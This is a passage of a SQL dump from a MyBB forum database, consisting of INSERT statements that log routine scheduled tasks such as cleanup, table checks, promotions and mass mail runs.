'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15212', '7', '1352261991', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15213', '5', '1352262132', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15214', '9', '1352262359', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15215', '5', '1352262625', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15216', '3', '1352262813', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15217', '9', '1352263698', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15218', '5', '1352263705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15219', '9', '1352264927', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15220', '3', '1352264932', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15221', '1', '1352264933', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15222', '7', '1352264939', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15223', '5', '1352264950', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15224', '9', '1352265014', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15225', '5', '1352270731', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15226', '9', '1352270779', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15227', '3', '1352271042', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15228', '1', '1352271135', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15229', '7', '1352271150', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15230', '9', '1352271676', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15231', '3', '1352271681', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15232', '1', '1352271687', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15233', '7', '1352271708', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15234', '5', '1352273587', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15235', '9', '1352273695', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15236', '3', '1352273754', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15237', '9', '1352274214', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15238', '5', '1352276833', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15239', '9', '1352276915', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15240', '3', '1352278082', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15241', '1', '1352278238', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15242', '7', '1352278267', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15243', '9', '1352278312', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15244', '5', '1352278329', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15245', '9', '1352278830', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15246', '3', '1352280386', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15247', '1', '1352280386', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15248', '7', '1352280391', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15249', '5', '1352280392', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15250', '9', '1352281784', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15251', '3', '1352283006', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15252', '5', '1352283010', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15253', '9', '1352284944', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15254', '1', '1352285014', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15255', '7', '1352285028', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15256', '5', '1352285581', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15257', '3', '1352285586', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15258', '9', '1352286069', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15259', '3', '1352286634', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15260', '1', '1352286653', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15261', '7', '1352286662', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15262', '5', '1352287870', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15263', '9', '1352287879', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15264', '3', '1352288016', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15265', '9', '1352289324', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15266', '5', '1352289343', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15267', '3', '1352289995', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15268', '1', '1352290001', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15269', '7', '1352290010', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15270', '5', '1352290011', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15271', '9', '1352290335', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15272', '5', '1352291108', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15273', '9', '1352291339', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15274', '3', '1352292181', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15275', '9', '1352292307', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15276', '5', '1352292380', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15277', '9', '1352292984', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15278', '3', '1352293169', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15279', '1', '1352293218', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15280', '7', '1352293227', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15281', '5', '1352293597', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15282', '9', '1352296619', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15283', '5', '1352296685', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15284', '3', '1352296688', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15285', '3', '1352296959', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15286', '1', '1352297806', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15287', '7', '1352297808', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15288', '5', '1352297813', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15289', '9', '1352297835', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15290', '5', '1352301553', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15291', '9', '1352301589', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15292', '3', '1352301636', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15293', '1', '1352301772', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15294', '7', '1352301775', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15295', '5', '1352304239', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15296', '9', '1352304283', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15297', '3', '1352304314', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15298', '1', '1352304486', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15299', '7', '1352304486', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15300', '5', '1352304527', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15301', '9', '1352308748', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15302', '5', '1352308859', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15303', '3', '1352308868', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15304', '1', '1352308937', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15305', '7', '1352309152', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15306', '5', '1352309159', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15307', '9', '1352309193', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15308', '3', '1352313323', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15309', '9', '1352313333', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15310', '5', '1352313352', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15311', '1', '1352313360', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15312', '7', '1352314367', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15313', '9', '1352314381', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15314', '5', '1352314394', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15315', '9', '1352314506', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15316', '3', '1352315245', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15317', '1', '1352315266', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15318', '7', '1352315273', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15319', '5', '1352315293', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15320', '9', '1352315422', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15321', '5', '1352316583', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15322', '9', '1352316626', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15323', '3', '1352316636', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15324', '9', '1352317227', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15325', '5', '1352317591', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15326', '9', '1352318125', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15327', '3', '1352318665', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15328', '1', '1352318702', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15329', '7', '1352318715', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15330', '5', '1352318721', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15331', '9', '1352319024', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15332', '5', '1352320424', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15333', '9', '1352320439', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15334', '3', '1352320638', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15335', '9', '1352320811', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15336', '5', '1352321545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15337', '9', '1352322039', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15338', '3', '1352322150', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15339', '1', '1352322179', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15340', '7', '1352322225', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15341', '5', '1352322613', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15342', '9', '1352323187', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15343', '5', '1352324582', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15344', '9', '1352324596', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15345', '3', '1352324611', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15346', '5', '1352324974', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15347', '9', '1352325320', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15348', '3', '1352326248', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15349', '1', '1352326251', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15350', '7', '1352326252', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15351', '5', '1352326285', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15352', '9', '1352326438', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15353', '5', '1352327483', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15354', '9', '1352328080', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15355', '3', '1352328095', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15356', '5', '1352328306', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15357', '9', '1352328907', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15358', '3', '1352329389', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15359', '1', '1352330488', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15360', '7', '1352330488', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15361', '5', '1352330562', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15362', '9', '1352330912', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15363', '5', '1352330978', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15364', '3', '1352331003', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15365', '9', '1352331839', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15366', '5', '1352332094', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15367', '9', '1352332684', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15368', '3', '1352333315', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15369', '1', '1352333350', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15370', '2', '1352333355', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15371', '7', '1352333460', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15372', '11', '1352333460', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15373', '5', '1352333631', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15374', '9', '1352333661', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15375', '5', '1352335455', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15376', '9', '1352338112', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15377', '3', '1352338542', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15378', '5', '1352338791', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15379', '1', '1352338983', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15380', '7', '1352339079', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15381', '9', '1352340463', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15382', '5', '1352341624', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15383', '3', '1352341894', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15384', '1', '1352341896', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15385', '7', '1352341906', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15386', '9', '1352342068', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15387', '9', '1352346238', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15388', '5', '1352346251', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15389', '3', '1352346255', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15390', '1', '1352346261', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15391', '7', '1352346495', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15392', '5', '1352346520', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15393', '9', '1352347113', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15394', '3', '1352347517', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15395', '1', '1352348609', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15396', '7', '1352348621', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15397', '5', '1352348626', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15398', '9', '1352348946', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15399', '5', '1352348959', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15400', '3', '1352349458', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15401', '9', '1352349647', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15402', '5', '1352349933', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15403', '9', '1352353759', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15404', '3', '1352353842', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15405', '1', '1352353868', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15406', '7', '1352353876', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15407', '5', '1352353886', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15408', '9', '1352356533', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15409', '3', '1352356625', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15410', '1', '1352357248', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15411', '7', '1352361024', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15412', '5', '1352361033', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15413', '9', '1352363372', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15414', '3', '1352363377', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15415', '1', '1352363387', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15416', '7', '1352363411', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15417', '5', '1352363461', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15418', '3', '1352364557', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15419', '9', '1352368425', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15420', '5', '1352368819', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15421', '3', '1352368833', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15422', '1', '1352369365', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15423', '7', '1352369369', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15424', '9', '1352371006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15425', '5', '1352371026', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15426', '3', '1352371057', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15427', '9', '1352371240', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15428', '5', '1352371882', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15429', '9', '1352372132', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15430', '3', '1352372375', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15431', '1', '1352372993', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15432', '7', '1352373003', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15433', '5', '1352373011', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15434', '9', '1352373015', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15435', '5', '1352375050', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15436', '9', '1352375059', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15437', '3', '1352375063', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15438', '5', '1352375109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15439', '9', '1352377696', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15440', '3', '1352377742', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15441', '1', '1352378685', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15442', '7', '1352379332', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15443', '5', '1352379340', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15444', '3', '1352379360', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15445', '9', '1352380152', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15446', '3', '1352381971', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15447', '1', '1352383938', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15448', '7', '1352383946', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15449', '5', '1352383950', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15450', '9', '1352383978', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15451', '3', '1352383990', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15452', '5', '1352385233', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15453', '9', '1352385708', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15454', '3', '1352386987', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15455', '5', '1352387090', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15456', '9', '1352387093', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15457', '1', '1352387174', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15458', '7', '1352387996', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15459', '5', '1352388005', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15460', '9', '1352389679', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15461', '5', '1352389690', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15462', '3', '1352390546', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15463', '9', '1352392125', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15464', '1', '1352392580', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15465', '7', '1352393054', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15466', '5', '1352393070', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15467', '3', '1352393661', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15468', '9', '1352394295', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15469', '5', '1352394296', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15470', '3', '1352394340', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15471', '1', '1352394344', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15472', '7', '1352394359', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15473', '5', '1352396548', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15474', '9', '1352398369', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15475', '3', '1352398451', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15476', '5', '1352398481', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15477', '1', '1352398696', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15478', '7', '1352398697', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15479', '5', '1352399840', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15480', '9', '1352402905', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15481', '3', '1352402985', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15482', '5', '1352403045', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15483', '1', '1352405264', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15484', '7', '1352405298', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15485', '3', '1352405313', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15486', '9', '1352406564', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15487', '5', '1352406579', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15488', '3', '1352406749', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15489', '9', '1352408010', 'The 